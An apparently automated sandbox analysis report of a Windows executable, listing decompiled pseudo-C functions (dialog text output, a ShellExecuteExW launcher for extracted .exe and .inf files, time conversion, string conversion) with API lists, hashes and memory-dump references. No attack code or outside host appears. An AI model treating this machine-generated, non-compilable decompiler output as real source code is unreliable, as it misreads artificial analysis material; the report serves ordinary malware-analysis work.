                                            0x00c3d38a
                                            0x00c3d38f
                                            0x00c3d392
                                            0x00c3d394
                                            0x00c3d396
                                            0x00c3d44c
                                            0x00c3d44f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d455
                                            0x00c3d455
                                            0x00c3d455
                                            0x00c3d459
                                            0x00c3d45c
                                            0x00000000
                                            0x00000000
                                            0x00c3d45e
                                            0x00c3d45e
                                            0x00c3d45e
                                            0x00c3d462
                                            0x00c3d467
                                            0x00c3d46a
                                            0x00c3d46f
                                            0x00c3d470
                                            0x00c3d472
                                            0x00c3d475
                                            0x00c3d496
                                            0x00c3d498
                                            0x00c3d4ad
                                            0x00c3d4b2
                                            0x00c3d4b5
                                            0x00c3d4b8
                                            0x00c3d4bb
                                            0x00c3d4de
                                            0x00c3d4e1
                                            0x00c3d4e6
                                            0x00c3d4e8
                                            0x00c3d4e8
                                            0x00c3d4fb
                                            0x00c3d500
                                            0x00c3d4bd
                                            0x00c3d4c9
                                            0x00c3d4d1
                                            0x00c3d4d6
                                            0x00c3d4d6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d477
                                            0x00c3d477
                                            0x00c3d477
                                            0x00c3d47a
                                            0x00000000
                                            0x00000000
                                            0x00c3d47c
                                            0x00c3d47f
                                            0x00c3d482
                                            0x00c3d48a
                                            0x00c3d48d
                                            0x00c3d48e
                                            0x00c3d491
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d491
                                            0x00c3d493
                                            0x00000000
                                            0x00c3d493
                                            0x00c3d464
                                            0x00c3d464
                                            0x00c3d455
                                            0x00c3d455
                                            0x00c3d459
                                            0x00c3d45c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d45c
                                            0x00c3d455
                                            0x00c3d3aa
                                            0x00000000
                                            0x00c3d3aa
                                            0x00c3d30a
                                            0x00c3d30e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d3b2
                                            0x00c3d3b2
                                            0x00c3d3b2
                                            0x00c3d3bb
                                            0x00c3d3be
                                            0x00000000
                                            0x00c3d2ba
                                            0x00c3d2bb
                                            0x00000000
                                            0x00c3d2c0
                                            0x00c3d2b8
                                            0x00c3d245
                                            0x00c3d247
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d080
                                            0x00c3d080
                                            0x00c3d083
                                            0x00c3d08c
                                            0x00c3d091
                                            0x00c3d092
                                            0x00c3d092
                                            0x00c3d09a
                                            0x00000000
                                            0x00c3d09a

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C3CFD9
                                            • _wcschr.LIBVCRUNTIME ref: 00C3CFFA
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C3D015
                                            • __fprintf_l.LIBCMT ref: 00C3D4FB
                                              • Part of subcall function 00C40FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C3B312,00000000,?,?,?,001C0078), ref: 00C40FFA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                            • API String ID: 4184910265-4124877899
                                            • Opcode ID: b0d8362947490c76c43154d5aaaa7a0974b10646b382a4a9bd064631751f7b20
                                            • Instruction ID: 336c719384c5d66e4e9c87690efa14b09bd45993a7c34153c191d46e34719de1
                                            • Opcode Fuzzy Hash: b0d8362947490c76c43154d5aaaa7a0974b10646b382a4a9bd064631751f7b20
                                            • Instruction Fuzzy Hash: B012D1B1A103099BDF24EF64EC81AED37B9EF04310F50052AF91A972A1EB71DA85DB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4C190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4C190(intOrPtr _a4, long _a8) {
				char _v67;
				intOrPtr _v72;
				signed int _v84;
				int _v88;
				void* _v92;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HWND__* _t45;
				char _t48;

				E00C4A388(); // executed
				_t45 = GetDlgItem( *0xc775c8, 0x68);
				_t48 =  *0xc775d6; // 0x1
				if(_t48 == 0) {
					_t43 =  *0xc775e8; // 0x0
					E00C48569(_t43);
					ShowWindow(_t45, 5); // executed
					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
					SendMessageW(_t45, 0xc2, 0, 0xc622e4);
					 *0xc775d6 = 1;
				}
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				_v92 = 0x5c;
				SendMessageW(_t45, 0x43a, 0,  &_v92);
				_v67 = 0;
				_t40 = _a4;
				_v88 = 1;
				if(_t40 != 0) {
					_v72 = 0xa0;
					_v88 = 0x40000001;
					_v84 = _v84 & 0xbfffffff | 1;
				}
				SendMessageW(_t45, 0x444, 1,  &_v92);
				SendMessageW(_t45, 0xc2, 0, _a8);
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t40 != 0) {
					_v84 = _v84 & 0xfffffffe | 0x40000000;
					SendMessageW(_t45, 0x444, 1,  &_v92);
				}
				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
			}












                                            0x00c4c197
                                            0x00c4c1b2
                                            0x00c4c1b9
                                            0x00c4c1bf
                                            0x00c4c1c1
                                            0x00c4c1c7
                                            0x00c4c1cf
                                            0x00c4c1de
                                            0x00c4c1e8
                                            0x00c4c1ea
                                            0x00c4c1ea
                                            0x00c4c1fe
                                            0x00c4c204
                                            0x00c4c214
                                            0x00c4c218
                                            0x00c4c21c
                                            0x00c4c221
                                            0x00c4c227
                                            0x00c4c232
                                            0x00c4c23c
                                            0x00c4c244
                                            0x00c4c244
                                            0x00c4c254
                                            0x00c4c25e
                                            0x00c4c26d
                                            0x00c4c271
                                            0x00c4c27f
                                            0x00c4c290
                                            0x00c4c290
                                            0x00c4c2a4

                                            APIs
                                              • Part of subcall function 00C4A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C4A399
                                              • Part of subcall function 00C4A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C4A3AA
                                              • Part of subcall function 00C4A388: IsDialogMessageW.USER32(001C0078,?), ref: 00C4A3BE
                                              • Part of subcall function 00C4A388: TranslateMessage.USER32(?), ref: 00C4A3CC
                                              • Part of subcall function 00C4A388: DispatchMessageW.USER32(?), ref: 00C4A3D6
                                            • GetDlgItem.USER32(00000068,00C8DE38), ref: 00C4C1A4
                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00C49D8F,00000001,?,?,00C4A5C0,00C63CB0,00C8DE38), ref: 00C4C1CF
                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C4C1DE
                                            • SendMessageW.USER32(00000000,000000C2,00000000,00C622E4), ref: 00C4C1E8
                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C4C1FE
                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C4C214
                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C4C254
                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C4C25E
                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C4C26D
                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C4C290
                                            • SendMessageW.USER32(00000000,000000C2,00000000,00C6304C), ref: 00C4C29B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                            • String ID: \
                                            • API String ID: 3569833718-2967466578
                                            • Opcode ID: e594a63544833c439ee0bb18f43e8d18296d6ad609ad74be991dc33a05156184
                                            • Instruction ID: 712cae60c6819fc57411cc360fbd1fe21bc1d3d97ece54206102dc42e2aa6599
                                            • Opcode Fuzzy Hash: e594a63544833c439ee0bb18f43e8d18296d6ad609ad74be991dc33a05156184
                                            • Instruction Fuzzy Hash: CD2126712497487BE321EB249C81FAF7B9CEF82754F000619F690A61D1C7A59A098AB7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4C431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 48%
                                            			E00C4C431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				signed int _t80;
				signed short* _t81;
				signed short _t82;
				intOrPtr _t84;
				long _t86;
				signed short* _t87;
				struct HWND__* _t89;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t99;

				_t54 = 0x1040;
				E00C4D940();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00C52B33(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E00C4E920(_t86,  &_a4, 0, _t86);
					_t84 = _a4172;
					_t99 = _t99 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t84 != 0) {
						_a8 = 0x5c0;
					}
					_t80 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_t95 = 0x22;
					if(_t80 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t80 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t84 == 0 &&  *0xc7a602 != _t77) {
								_a24 = 0xc7a602;
							}
						}
						_a32 = 1;
						_t93 = E00C3B153(_t87);
						if(_t93 != 0 && E00C41410(_t93, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00C39E6B(_a20) != 0) {
							_push(0x800);
							_push( &_a64);
							_push(_a20);
							E00C3AED7();
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t89 = _a4160;
							if( *0xc785f8 != _t77 || _a4168 != _t77 ||  *0xc8de21 != _t77) {
								if(_t89 != 0) {
									_push(_t89);
									if( *0xc6df24() != 0) {
										ShowWindow(_t89, _t77);
										_t77 = 1;
									}
								}
								 *0xc6df20(_a56, 0x7d0);
								E00C4C8F0(_a48);
								if( *0xc8de21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0xc8de24) {
										 *0xc8de24 = _t68;
									}
									 *0xc8de22 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t93 == 0 || E00C41410(_t93, L".exe") != 0) {
								_t54 = _a4160;
								if( *0xc785f8 != 0 && _t54 == 0 &&  *0xc8de21 == _t54) {
									 *0xc8de28 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t89, 1);
							}
						}
						goto L55;
					}
					_t81 = _t91;
					_v0 = 0x20;
					do {
						if( *_t81 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t82 = _v0;
									_t91[_t57] = _t82;
									L10:
									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t82 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t81 =  &(_t91[_t57]);
					} while ( *_t81 != _t77);
					goto L13;
				}
			}






















                                            0x00c4c431
                                            0x00c4c436
                                            0x00c4c43d
                                            0x00c4c444
                                            0x00c4c449
                                            0x00c4c695
                                            0x00c4c69d
                                            0x00c4c69d
                                            0x00c4c450
                                            0x00c4c45b
                                            0x00000000
                                            0x00c4c461
                                            0x00c4c464
                                            0x00c4c46c
                                            0x00c4c471
                                            0x00c4c478
                                            0x00c4c47b
                                            0x00c4c47f
                                            0x00c4c489
                                            0x00c4c48b
                                            0x00c4c48b
                                            0x00c4c493
                                            0x00c4c496
                                            0x00c4c49c
                                            0x00c4c4a0
                                            0x00c4c4a2
                                            0x00c4c4a2
                                            0x00c4c4a4
                                            0x00c4c4a8
                                            0x00c4c4ad
                                            0x00c4c4e5
                                            0x00c4c4e5
                                            0x00c4c4e9
                                            0x00c4c4eb
                                            0x00c4c4f4
                                            0x00c4c4ff
                                            0x00c4c4ff
                                            0x00c4c4f4
                                            0x00c4c508
                                            0x00c4c515
                                            0x00c4c519
                                            0x00c4c52a
                                            0x00c4c52a
                                            0x00c4c53d
                                            0x00c4c53f
                                            0x00c4c548
                                            0x00c4c549
                                            0x00c4c54d
                                            0x00c4c556
                                            0x00c4c556
                                            0x00c4c55f
                                            0x00c4c567
                                            0x00c4c56d
                                            0x00c4c580
                                            0x00c4c595
                                            0x00c4c597
                                            0x00c4c5a0
                                            0x00c4c5a4
                                            0x00c4c5a6
                                            0x00c4c5a6
                                            0x00c4c5a0
                                            0x00c4c5b1
                                            0x00c4c5bb
                                            0x00c4c5c7
                                            0x00c4c5e6
                                            0x00c4c5f0
                                            0x00c4c5f2
                                            0x00c4c5f2
                                            0x00c4c5f7
                                            0x00c4c5f7
                                            0x00c4c5c7
                                            0x00c4c602
                                            0x00c4c60a
                                            0x00c4c622
                                            0x00c4c629
                                            0x00c4c637
                                            0x00c4c637
                                            0x00c4c67f
                                            0x00c4c67f
                                            0x00c4c67f
                                            0x00c4c688
                                            0x00c4c691
                                            0x00c4c691
                                            0x00c4c688
                                            0x00000000
                                            0x00c4c694
                                            0x00c4c4af
                                            0x00c4c4b1
                                            0x00c4c4b9
                                            0x00c4c4bc
                                            0x00c4c649
                                            0x00c4c649
                                            0x00c4c64e
                                            0x00000000
                                            0x00000000
                                            0x00c4c647
                                            0x00c4c655
                                            0x00c4c659
                                            0x00c4c4c6
                                            0x00c4c4ca
                                            0x00c4c66a
                                            0x00c4c66e
                                            0x00c4c66e
                                            0x00c4c673
                                            0x00c4c676
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4c4ca
                                            0x00c4c647
                                            0x00c4c650
                                            0x00c4c4c2
                                            0x00000000
                                            0x00c4c4dc
                                            0x00c4c4dc
                                            0x00c4c4dd
                                            0x00c4c4e0
                                            0x00000000
                                            0x00c4c4b9

                                            APIs
                                            • ShellExecuteExW.SHELL32(000001C0), ref: 00C4C55F
                                            • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00C4C5A4
                                            • GetExitCodeProcess.KERNEL32 ref: 00C4C5DC
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4C602
                                            • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00C4C691
                                              • Part of subcall function 00C41410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C3ACFE,?,?,?,00C3ACAD,?,-00000002,?,00000000,?), ref: 00C41426
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                            • String ID: $.exe$.inf
                                            • API String ID: 3686203788-2452507128
                                            • Opcode ID: 9b8fcba3bdb3ee3c298968a881c7646967c82c5625322dae574b573f1c5c37d6
                                            • Instruction ID: ed8f1e9b45d5a2046e86f3da69c24630f1cd8bc53282dd2b1e6b1fff8b7e1055
                                            • Opcode Fuzzy Hash: 9b8fcba3bdb3ee3c298968a881c7646967c82c5625322dae574b573f1c5c37d6
                                            • Instruction Fuzzy Hash: 8651FE7050A3809AD7719F60D990BBFB7E8BF84304F08581DF5E2971B0D7B19A88AB56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C406E0, Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00C406E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t92;
				signed int _t94;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E00C4DEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E00C3A995() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16); // executed
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebp");
					asm("adc ecx, ebp");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebp");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t92 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t94 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t92[3] = _v48.wHour & 0x0000ffff;
				_t92[4] = _v48.wMinute & 0x0000ffff;
				_t92[5] = _v48.wSecond & 0x0000ffff;
				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t92 = _v48.wYear & 0x0000ffff;
				_t92[1] = _t94;
				_t92[2] = _t85;
				_t92[8] = _t85 - 1;
				if(_t94 > 1) {
					_t89 = 0xc6d084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t92[8] = _t92[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t94) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t94 > 2 && E00C40849(_t88) != 0) {
					_t92[8] = _t92[8] + 1;
				}
				_t73 = E00C4DF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t92[6] = _t73;
				return _t73;
			}




















                                            0x00c406e0
                                            0x00c406e7
                                            0x00c406f8
                                            0x00c406fc
                                            0x00c40710
                                            0x00c4072e
                                            0x00c4073b
                                            0x00c40751
                                            0x00c4075d
                                            0x00c4076b
                                            0x00c40773
                                            0x00c40779
                                            0x00c4077f
                                            0x00c40783
                                            0x00c40785
                                            0x00c40712
                                            0x00c4071c
                                            0x00c4071c
                                            0x00c40793
                                            0x00c40795
                                            0x00c407a0
                                            0x00c407a1
                                            0x00c407a6
                                            0x00c407ab
                                            0x00c407b0
                                            0x00c407b8
                                            0x00c407c0
                                            0x00c407c8
                                            0x00c407ce
                                            0x00c407d0
                                            0x00c407d3
                                            0x00c407d6
                                            0x00c407db
                                            0x00c407df
                                            0x00c407e4
                                            0x00c407e5
                                            0x00c407ec
                                            0x00c407ef
                                            0x00c407f2
                                            0x00c407f5
                                            0x00c407f8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c407f8
                                            0x00c407fa
                                            0x00c407fa
                                            0x00c40802
                                            0x00c4080e
                                            0x00c4080e
                                            0x00c4081d
                                            0x00c40823
                                            0x00c4082c

                                            APIs
                                            • __aulldiv.LIBCMT ref: 00C406F3
                                              • Part of subcall function 00C3A995: GetVersionExW.KERNEL32(?), ref: 00C3A9BA
                                            • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00C4071C
                                            • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00C4072E
                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00C4073B
                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C40751
                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C4075D
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C40793
                                            • __aullrem.LIBCMT ref: 00C4081D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                            • String ID:
                                            • API String ID: 1247370737-0
                                            • Opcode ID: 3a3deb6babf9aae2e63580dcb1c9ac9f9abe56c46712c9ed614443ec11636f67
                                            • Instruction ID: ec03c8e73472f07f026704d27387d4367f97746b68f4fea3d5110438cd29f384
                                            • Opcode Fuzzy Hash: 3a3deb6babf9aae2e63580dcb1c9ac9f9abe56c46712c9ed614443ec11636f67
                                            • Instruction Fuzzy Hash: 9C4119B2448305AFC720DF65C880A6BF7E8FF88714F104A2EF69692650E775E548DB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C595A5, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 71%
                                            			E00C595A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t69;
				int _t77;
				short* _t80;
				signed int _t86;
				signed int _t89;
				void* _t94;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				int _t104;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xc6d668; // 0x13bcba52
				_v8 = _t49 ^ _t105;
				_push(__esi);
				_t102 = _a20;
				if(_t102 > 0) {
					_t77 = E00C5DBBC(_a16, _t102);
					_t109 = _t77 - _t102;
					_t4 = _t77 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t77;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00C4E203(_t54, _v8 ^ _t105);
				} else {
					_t94 = _t54 + _t54;
					_t84 = _t94 + 8;
					asm("sbb eax, eax");
					if((_t94 + 0x00000008 & _t54) == 0) {
						_t80 = 0;
						__eflags = 0;
						L14:
						if(_t80 == 0) {
							L36:
							_t104 = 0;
							L37:
							E00C5980D(_t80);
							_t54 = _t104;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
						_t120 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t59 = E00C59C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
						_t104 = _t59;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t86 = _t95 + 8;
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							__eflags = _t86 & _t59;
							if((_t86 & _t59) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E00C5980D(_t100);
									goto L36;
								}
								_t61 = E00C59C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E00C5980D(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t89 = _t95 + 8;
							__eflags = _t95 - _t89;
							asm("sbb eax, eax");
							_t65 = _t59 & _t89;
							_t86 = _t95 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t95 - _t86;
								asm("sbb eax, eax");
								_t100 = E00C57A8A(_t86, _t65 & _t86);
								_pop(_t86);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							E00C60EE0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t69 = _a28;
						if(_t69 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t69;
						if(_t104 > _t69) {
							goto L36;
						}
						_t104 = E00C59C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
						if(_t104 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t71 = _t54 & _t94 + 0x00000008;
					_t84 = _t94 + 8;
					if((_t54 & _t94 + 0x00000008) > 0x400) {
						__eflags = _t94 - _t84;
						asm("sbb eax, eax");
						_t80 = E00C57A8A(_t84, _t71 & _t84);
						_pop(_t84);
						__eflags = _t80;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t80 = 0xdddd;
						L12:
						_t80 =  &(_t80[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00C60EE0();
					_t80 = _t106;
					if(_t80 == 0) {
						goto L36;
					}
					 *_t80 = 0xcccc;
					goto L12;
				}
			}


























                                            0x00c595aa
                                            0x00c595ab
                                            0x00c595ac
                                            0x00c595b3
                                            0x00c595b7
                                            0x00c595b8
                                            0x00c595be
                                            0x00c595c4
                                            0x00c595ca
                                            0x00c595cd
                                            0x00c595cd
                                            0x00c595d0
                                            0x00c595d2
                                            0x00c595d2
                                            0x00c595d0
                                            0x00c595d4
                                            0x00c595d9
                                            0x00c595e0
                                            0x00c595e3
                                            0x00c595e3
                                            0x00c595ff
                                            0x00c59605
                                            0x00c5960a
                                            0x00c5979d
                                            0x00c597b0
                                            0x00c59610
                                            0x00c59610
                                            0x00c59613
                                            0x00c59618
                                            0x00c5961c
                                            0x00c59670
                                            0x00c59670
                                            0x00c59672
                                            0x00c59674
                                            0x00c59792
                                            0x00c59792
                                            0x00c59794
                                            0x00c59795
                                            0x00c5979b
                                            0x00000000
                                            0x00c5979b
                                            0x00c59685
